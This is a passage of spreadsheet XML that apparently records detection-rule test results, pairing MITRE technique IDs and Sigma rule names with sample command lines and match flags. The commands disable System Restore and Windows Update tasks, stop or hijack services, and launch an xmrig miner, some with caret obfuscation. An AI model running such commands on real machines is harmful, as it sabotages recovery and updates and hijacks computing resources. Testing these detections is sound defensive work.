      </c>
    </row>
    <row r="96" ht="15.75" customHeight="1" s="42">
      <c r="A96" s="41" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B96" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_stop_service</t>
        </is>
      </c>
      <c r="C96" s="41" t="inlineStr">
        <is>
          <t>Stop Windows Service Via PowerShell Stop-Service</t>
        </is>
      </c>
      <c r="D96" s="41" t="inlineStr">
        <is>
          <t>c49c5062-0966-4170-9efd-9968c913a6cf</t>
        </is>
      </c>
      <c r="E96" s="41" t="inlineStr">
        <is>
          <t>pwsh.exe -c "Stop-Service -n 'fax' -Force -ea SilentlyContinue; Set-Service -n 'fax' -b '$env:windir\system32\notepad.exe'; Start-Service -n 'fax' -ea SilentlyContinue"</t>
        </is>
      </c>
      <c r="F96" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G96" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H96" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I96" s="41" t="n"/>
      <c r="J96" s="41" t="n"/>
      <c r="K96" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="97" ht="15.75" customHeight="1" s="42">
      <c r="A97" s="41" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B97" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_stop_service</t>
        </is>
      </c>
      <c r="C97" s="41" t="inlineStr">
        <is>
          <t>Stop Windows Service Via PowerShell Stop-Service</t>
        </is>
      </c>
      <c r="D97" s="41" t="inlineStr">
        <is>
          <t>c49c5062-0966-4170-9efd-9968c913a6cf</t>
        </is>
      </c>
      <c r="E97" s="41" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; {Stop-Service -Name (`"fax"`) -Force -ErrorAction SilentlyContinue; Set-Service -Name (`"fax"`) -BinaryPathName (`"$env:windir\system32\notepad.exe"`); Start-Service -Name (`"fax"`) -ErrorAction SilentlyContinue}"</t>
        </is>
      </c>
      <c r="F97" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G97" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H97" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I97" s="41" t="n"/>
      <c r="J97" s="41" t="n"/>
      <c r="K97" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="98" ht="15.75" customHeight="1" s="42">
      <c r="A98" s="41" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B98" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_stop_service</t>
        </is>
      </c>
      <c r="C98" s="41" t="inlineStr">
        <is>
          <t>Stop Windows Service Via Sc.EXE</t>
        </is>
      </c>
      <c r="D98" s="41" t="inlineStr">
        <is>
          <t>81bcb81b-5b1f-474b-b373-52c871aaa7b1</t>
        </is>
      </c>
      <c r="E98" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c sc.exe st^op spooler</t>
        </is>
      </c>
      <c r="F98" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G98" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H98" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I98" s="41" t="inlineStr">
        <is>
          <t>Stop Windows Service Via Sc.EXE (81bcb81b-5b1f-474b-b373-52c871aaa7b1)</t>
        </is>
      </c>
      <c r="J98" s="41" t="n"/>
      <c r="K98" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="99" ht="15.75" customHeight="1" s="42">
      <c r="A99" s="41" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B99" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_delete</t>
        </is>
      </c>
      <c r="C99" s="41" t="inlineStr">
        <is>
          <t>Delete Important Scheduled Task</t>
        </is>
      </c>
      <c r="D99" s="41" t="inlineStr">
        <is>
          <t>dbc1f800-0fe0-4bc0-9c66-292c2abe3f78</t>
        </is>
      </c>
      <c r="E99" s="41" t="inlineStr">
        <is>
          <t>schtasks.exe -delete -tn "\Windows\WindowsUpdate\Automatic App Update"</t>
        </is>
      </c>
      <c r="F99" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G99" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H99" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I99" s="41" t="n"/>
      <c r="J99" s="41" t="n"/>
      <c r="K99" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="100" ht="15.75" customHeight="1" s="42">
      <c r="A100" s="41" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B100" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_delete</t>
        </is>
      </c>
      <c r="C100" s="41" t="inlineStr">
        <is>
          <t>Delete Important Scheduled Task</t>
        </is>
      </c>
      <c r="D100" s="41" t="inlineStr">
        <is>
          <t>dbc1f800-0fe0-4bc0-9c66-292c2abe3f78</t>
        </is>
      </c>
      <c r="E100" s="41" t="inlineStr">
        <is>
          <t>schtasks.exe /Delete /Tn "\Windows\WindowsUpdate\Automatic App Update" /F</t>
        </is>
      </c>
      <c r="F100" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G100" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H100" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I100" s="41" t="n"/>
      <c r="J100" s="41" t="n"/>
      <c r="K100" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="101" ht="15.75" customHeight="1" s="42">
      <c r="A101" s="41" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B101" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_delete</t>
        </is>
      </c>
      <c r="C101" s="41" t="inlineStr">
        <is>
          <t>Delete Important Scheduled Task</t>
        </is>
      </c>
      <c r="D101" s="41" t="inlineStr">
        <is>
          <t>dbc1f800-0fe0-4bc0-9c66-292c2abe3f78</t>
        </is>
      </c>
      <c r="E101" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c schtasks.exe /del^ete /tn "\Windows\WindowsUpdate\Automatic App Update"</t>
        </is>
      </c>
      <c r="F101" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G101" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H101" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I101" s="41" t="inlineStr">
        <is>
          <t>Delete Important Scheduled Task (dbc1f800-0fe0-4bc0-9c66-292c2abe3f78)</t>
        </is>
      </c>
      <c r="J101" s="41" t="n"/>
      <c r="K101" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="102" ht="15.75" customHeight="1" s="42">
      <c r="A102" s="41" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B102" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_delete</t>
        </is>
      </c>
      <c r="C102" s="41" t="inlineStr">
        <is>
          <t>Delete Important Scheduled Task</t>
        </is>
      </c>
      <c r="D102" s="41" t="inlineStr">
        <is>
          <t>dbc1f800-0fe0-4bc0-9c66-292c2abe3f78</t>
        </is>
      </c>
      <c r="E102" s="41" t="inlineStr">
        <is>
          <t>schtasks.exe "/delete" "/tn" "\Windows\WindowsUpdate\Automatic App Update"</t>
        </is>
      </c>
      <c r="F102" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G102" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H102" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I102" s="41" t="n"/>
      <c r="J102" s="41" t="n"/>
      <c r="K102" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="103" ht="15.75" customHeight="1" s="42">
      <c r="A103" s="41" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B103" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_disable</t>
        </is>
      </c>
      <c r="C103" s="41" t="inlineStr">
        <is>
          <t>Disable Important Scheduled Task</t>
        </is>
      </c>
      <c r="D103" s="41" t="inlineStr">
        <is>
          <t>9ac94dc8-9042-493c-ba45-3b5e7c86b980</t>
        </is>
      </c>
      <c r="E103" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c schtasks.exe /Ch^a^nge /TN "\Microsoft\Windows\SystemRestore\SR" /dis^able</t>
        </is>
      </c>
      <c r="F103" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G103" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H103" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I103" s="41" t="inlineStr">
        <is>
          <t>Disable Important Scheduled Task (9ac94dc8-9042-493c-ba45-3b5e7c86b980)</t>
        </is>
      </c>
      <c r="J103" s="41" t="n"/>
      <c r="K103" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="104" ht="15.75" customHeight="1" s="42">
      <c r="A104" s="41" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B104" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_disable</t>
        </is>
      </c>
      <c r="C104" s="41" t="inlineStr">
        <is>
          <t>Disable Important Scheduled Task</t>
        </is>
      </c>
      <c r="D104" s="41" t="inlineStr">
        <is>
          <t>9ac94dc8-9042-493c-ba45-3b5e7c86b980</t>
        </is>
      </c>
      <c r="E104" s="41" t="inlineStr">
        <is>
          <t>schtasks.exe /disable /TN "\Microsoft\Windows\SystemRestore\SR" /Change</t>
        </is>
      </c>
      <c r="F104" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G104" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H104" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I104" s="41" t="inlineStr">
        <is>
          <t>Disable Important Scheduled Task (9ac94dc8-9042-493c-ba45-3b5e7c86b980)</t>
        </is>
      </c>
      <c r="J104" s="41" t="n"/>
      <c r="K104" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="105" ht="15.75" customHeight="1" s="42">
      <c r="A105" s="41" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B105" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_service_tamper</t>
        </is>
      </c>
      <c r="C105" s="41" t="inlineStr">
        <is>
          <t>Suspicious Windows Service Tampering</t>
        </is>
      </c>
      <c r="D105" s="41" t="inlineStr">
        <is>
          <t>ce72ef99-22f1-43d4-8695-419dcb5d9330</t>
        </is>
      </c>
      <c r="E105" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c "sc\tstop\tBITS"</t>
        </is>
      </c>
      <c r="F105" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G105" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H105" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I105" s="41" t="n"/>
      <c r="J105" s="41" t="n"/>
      <c r="K105" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="106" ht="15.75" customHeight="1" s="42">
      <c r="A106" s="41" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B106" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_desktop_background_change</t>
        </is>
      </c>
      <c r="C106" s="41" t="inlineStr">
        <is>
          <t>Potentially Suspicious Desktop Background Change Using Reg.EXE</t>
        </is>
      </c>
      <c r="D106" s="41" t="inlineStr">
        <is>
          <t>8cbc9475-8d05-4e27-9c32-df960716c701</t>
        </is>
      </c>
      <c r="E106" s="41" t="inlineStr">
        <is>
          <t>reg.exe add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\\Temp\\test.jpg" /f</t>
        </is>
      </c>
      <c r="F106" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G106" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H106" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I106" s="41" t="inlineStr">
        <is>
          <t>Potentially Suspicious Desktop Background Change Using Reg.EXE (8cbc9475-8d05-4e27-9c32-df960716c701)</t>
        </is>
      </c>
      <c r="J106" s="41" t="n"/>
      <c r="K106" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="107" ht="15.75" customHeight="1" s="42">
      <c r="A107" s="41" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B107" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_desktop_background_change</t>
        </is>
      </c>
      <c r="C107" s="41" t="inlineStr">
        <is>
          <t>Potentially Suspicious Desktop Background Change Using Reg.EXE</t>
        </is>
      </c>
      <c r="D107" s="41" t="inlineStr">
        <is>
          <t>8cbc9475-8d05-4e27-9c32-df960716c701</t>
        </is>
      </c>
      <c r="E107" s="41" t="inlineStr">
        <is>
          <t>reg.exe add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Temp\test.jpg"</t>
        </is>
      </c>
      <c r="F107" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G107" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H107" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I107" s="41" t="inlineStr">
        <is>
          <t>Potentially Suspicious Desktop Background Change Using Reg.EXE (8cbc9475-8d05-4e27-9c32-df960716c701)</t>
        </is>
      </c>
      <c r="J107" s="41" t="n"/>
      <c r="K107" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="108" ht="15.75" customHeight="1" s="42">
      <c r="A108" s="41" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B108" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_desktop_background_change</t>
        </is>
      </c>
      <c r="C108" s="41" t="inlineStr">
        <is>
          <t>Potentially Suspicious Desktop Background Change Using Reg.EXE</t>
        </is>
      </c>
      <c r="D108" s="41" t="inlineStr">
        <is>
          <t>8cbc9475-8d05-4e27-9c32-df960716c701</t>
        </is>
      </c>
      <c r="E108" s="41" t="inlineStr">
        <is>
          <t>reg.exe add "HKCU\Control Panel\Desktop" /v Wallpaper /d "C:\Temp\test.jpg" /t REG_SZ /f</t>
        </is>
      </c>
      <c r="F108" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G108" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H108" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I108" s="41" t="inlineStr">
        <is>
          <t>Potentially Suspicious Desktop Background Change Using Reg.EXE (8cbc9475-8d05-4e27-9c32-df960716c701)</t>
        </is>
      </c>
      <c r="J108" s="41" t="n"/>
      <c r="K108" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="109" ht="15.75" customHeight="1" s="42">
      <c r="A109" s="41" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B109" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_desktop_background_change</t>
        </is>
      </c>
      <c r="C109" s="41" t="inlineStr">
        <is>
          <t>Potentially Suspicious Desktop Background Change Using Reg.EXE</t>
        </is>
      </c>
      <c r="D109" s="41" t="inlineStr">
        <is>
          <t>8cbc9475-8d05-4e27-9c32-df960716c701</t>
        </is>
      </c>
      <c r="E109" s="41" t="inlineStr">
        <is>
          <t>reg.exe add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "%TEMP%\test.jpg" /f</t>
        </is>
      </c>
      <c r="F109" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G109" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H109" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I109" s="41" t="inlineStr">
        <is>
          <t>Potentially Suspicious Desktop Background Change Using Reg.EXE (8cbc9475-8d05-4e27-9c32-df960716c701)</t>
        </is>
      </c>
      <c r="J109" s="41" t="n"/>
      <c r="K109" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="110" ht="15.75" customHeight="1" s="42">
      <c r="A110" s="41" t="inlineStr">
        <is>
          <t>t1496</t>
        </is>
      </c>
      <c r="B110" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_crypto_mining_monero</t>
        </is>
      </c>
      <c r="C110" s="41" t="inlineStr">
        <is>
          <t>Potential Crypto Mining Activity</t>
        </is>
      </c>
      <c r="D110" s="41" t="inlineStr">
        <is>
          <t>66c3b204-9f88-4d0a-a7f7-8a57d521ca55</t>
        </is>
      </c>
      <c r="E110" s="41" t="inlineStr">
        <is>
          <t>xmrig.exe -o pool.example.com:3333 -u wallet --donate-level 0</t>
        </is>
      </c>
      <c r="F110" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G110" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H110" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I110" s="41" t="n"/>
      <c r="J110" s="41" t="n"/>
      <c r="K110" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="111" ht="15.75" customHeight="1" s="42">
      <c r="A111" s="41" t="inlineStr">
        <is>
          <t>t1496</t>
        </is>
      </c>
      <c r="B111" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_crypto_mining_monero</t>
        </is>
      </c>
      <c r="C111" s="41" t="inlineStr">
        <is>
          <t>Potential Crypto Mining Activity</t>
        </is>
      </c>
      <c r="D111" s="41" t="inlineStr">
        <is>
          <t>66c3b204-9f88-4d0a-a7f7-8a57d521ca55</t>
        </is>
      </c>
      <c r="E111" s="41" t="inlineStr">
        <is>
          <t>xmrig.exe "-o" pool.example.com:3333 -u wallet --donate-level=0 gcc -o pool.o src/pool.c</t>
        </is>
      </c>
      <c r="F111" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G111" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H111" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I111" s="41" t="n"/>
      <c r="J111" s="41" t="n"/>
      <c r="K111" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="112" ht="15.75" customHeight="1" s="42">
      <c r="A112" s="41" t="inlineStr">
        <is>
          <t>t1496</t>
        </is>
      </c>
      <c r="B112" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_crypto_mining_monero</t>
        </is>
      </c>
      <c r="C112" s="41" t="inlineStr">
        <is>
          <t>Potential Crypto Mining Activity</t>
        </is>
      </c>
      <c r="D112" s="41" t="inlineStr">
        <is>
          <t>66c3b204-9f88-4d0a-a7f7-8a57d521ca55</t>
        </is>
      </c>
      <c r="E112" s="41" t="inlineStr">
        <is>
          <t>xmrig.exe --donate-level=00 -o pool.example.com:3333 -u wallet</t>
        </is>
      </c>
      <c r="F112" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G112" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H112" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I112" s="41" t="n"/>
      <c r="J112" s="41" t="n"/>
      <c r="K112" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="113" ht="15.75" customHeight="1" s="42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</row>
    <row r="114" ht="15.75" customHeight="1" s="42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</row>
    <row r="115" ht="15.75" customHeight="1" s="42">
      <c r="A115" s="34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</row>
    <row r="116" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="118" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="120" ht="15.75" customHeight="1" s="42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</row>
    <row r="121" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42">
      <c r="A125" s="34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15.75" customHeight="1" s="42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</row>
    <row r="127" ht="15.75" customHeight="1" s="42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</row>
    <row r="128" ht="15.75" customHeight="1" s="42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</row>
    <row r="129" ht="15.75" customHeight="1" s="42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</row>
    <row r="130" ht="15.75" customHeight="1" s="42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</row>
    <row r="131" ht="15.75" customHeight="1" s="42">
      <c r="A131" s="34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 ht="15.75" customHeight="1" s="42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</row>
    <row r="133" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="135" ht="15.75" customHeight="1" s="42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</row>
    <row r="136" ht="15.75" customHeight="1" s="42">
      <c r="A136" s="34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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42">
      <c r="A140" s="34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15.75" customHeight="1" s="42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</row>
    <row r="142" ht="15.75" customHeight="1" s="42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</row>
    <row r="143" ht="15.75" customHeight="1" s="42">
      <c r="A143" s="34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</row>
    <row r="144" ht="15.75" customHeight="1" s="42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</row>
    <row r="145" ht="15.75" customHeight="1" s="42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</row>
    <row r="146" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="148" ht="15.75" customHeight="1" s="42">
      <c r="A148" s="34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 ht="15.75" customHeight="1" s="42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</row>
    <row r="150" ht="15.75" customHeight="1" s="42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</row>
    <row r="151" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42">
      <c r="A152" s="34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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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15.75" customHeight="1" s="42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</row>
    <row r="157" ht="15.75" customHeight="1" s="42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</row>
    <row r="158" ht="15.75" customHeight="1" s="42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</row>
    <row r="159" ht="15.75" customHeight="1" s="42">
      <c r="A159" s="34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</row>
    <row r="160" ht="15.75" customHeight="1" s="42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</row>
    <row r="161" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42">
      <c r="A162" s="34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</row>
    <row r="163" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="165" ht="15.75" customHeight="1" s="42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</row>
    <row r="166" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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15.75" customHeight="1" s="42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</row>
    <row r="172" ht="15.75" customHeight="1" s="42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</row>
    <row r="173" ht="15.75" customHeight="1" s="42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</row>
    <row r="174" ht="15.75" customHeight="1" s="42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</row>
    <row r="175" ht="15.75" customHeight="1" s="42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</row>
    <row r="176" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="178" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="180" ht="15.75" customHeight="1" s="42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</row>
    <row r="181" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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15.75" customHeight="1" s="42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</row>
    <row r="187" ht="15.75" customHeight="1" s="42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</row>
    <row r="188" ht="15.75" customHeight="1" s="42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</row>
    <row r="189" ht="15.75" customHeight="1" s="42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</row>
    <row r="190" ht="15.75" customHeight="1" s="42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</row>
    <row r="191" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="193" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="195" ht="15.75" customHeight="1" s="42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</row>
    <row r="196" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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15.75" customHeight="1" s="42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</row>
    <row r="202" ht="15.75" customHeight="1" s="42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</row>
    <row r="203" ht="15.75" customHeight="1" s="42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</row>
    <row r="204" ht="15.75" customHeight="1" s="42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</row>
    <row r="205" ht="15.75" customHeight="1" s="42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</row>
    <row r="206" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="208" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="210" ht="15.75" customHeight="1" s="42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</row>
    <row r="211" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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15.75" customHeight="1" s="42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</row>
    <row r="217" ht="15.75" customHeight="1" s="42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</row>
    <row r="218" ht="15.75" customHeight="1" s="42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</row>
    <row r="219" ht="15.75" customHeight="1" s="42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</row>
    <row r="220" ht="15.75" customHeight="1" s="42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</row>
    <row r="221" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="223" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="225" ht="15.75" customHeight="1" s="42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</row>
    <row r="226" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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15.75" customHeight="1" s="42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</row>
    <row r="232" ht="15.75" customHeight="1" s="42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</row>
    <row r="233" ht="15.75" customHeight="1" s="42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</row>
    <row r="234" ht="15.75" customHeight="1" s="42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</row>
    <row r="235" ht="15.75" customHeight="1" s="42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</row>
    <row r="236" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="238" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="240" ht="15.75" customHeight="1" s="42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</row>
    <row r="241" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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15.75" customHeight="1" s="42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</row>
    <row r="247" ht="15.75" customHeight="1" s="42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</row>
    <row r="248" ht="15.75" customHeight="1" s="42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</row>
    <row r="249" ht="15.75" customHeight="1" s="42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</row>
    <row r="250" ht="15.75" customHeight="1" s="42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</row>
    <row r="251" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="253" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="255" ht="15.75" customHeight="1" s="42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</row>
    <row r="256" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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15.75" customHeight="1" s="42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</row>
    <row r="262" ht="15.75" customHeight="1" s="42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</row>
    <row r="263" ht="15.75" customHeight="1" s="42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</row>
    <row r="264" ht="15.75" customHeight="1" s="42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</row>
    <row r="265" ht="15.75" customHeight="1" s="42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</row>
    <row r="266" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="268" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="270" ht="15.75" customHeight="1" s="42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</row>
    <row r="271" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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15.75" customHeight="1" s="42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</row>
    <row r="277" ht="15.75" customHeight="1" s="42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</row>
    <row r="278" ht="15.75" customHeight="1" s="42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</row>
    <row r="279" ht="15.75" customHeight="1" s="42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</row>
    <row r="280" ht="15.75" customHeight="1" s="42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</row>
    <row r="281" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="283" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="285" ht="15.75" customHeight="1" s="42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</row>
    <row r="286" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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15.75" customHeight="1" s="42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</row>
    <row r="292" ht="15.75" customHeight="1" s="42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</row>
    <row r="293" ht="15.75" customHeight="1" s="42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</row>
    <row r="294" ht="15.75" customHeight="1" s="42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</row>
    <row r="295" ht="15.75" customHeight="1" s="42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</row>
    <row r="296" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="298" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="300" ht="15.75" customHeight="1" s="42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</row>
    <row r="301" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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15.75" customHeight="1" s="42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</row>
    <row r="307" ht="15.75" customHeight="1" s="42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</row>
    <row r="308" ht="15.75" customHeight="1" s="42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</row>
    <row r="309" ht="15.75" customHeight="1" s="42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</row>
    <row r="310" ht="15.75" customHeight="1" s="42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</row>
    <row r="311" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="313" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="315" ht="15.75" customHeight="1" s="42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</row>
    <row r="316" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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15.75" customHeight="1" s="42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</row>
    <row r="322" ht="15.75" customHeight="1" s="4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</row>
    <row r="323" ht="15.75" customHeight="1" s="42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</row>
    <row r="324" ht="15.75" customHeight="1" s="42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</row>
    <row r="325" ht="15.75" customHeight="1" s="42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</row>
    <row r="326" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="328" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="330" ht="15.75" customHeight="1" s="42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</row>
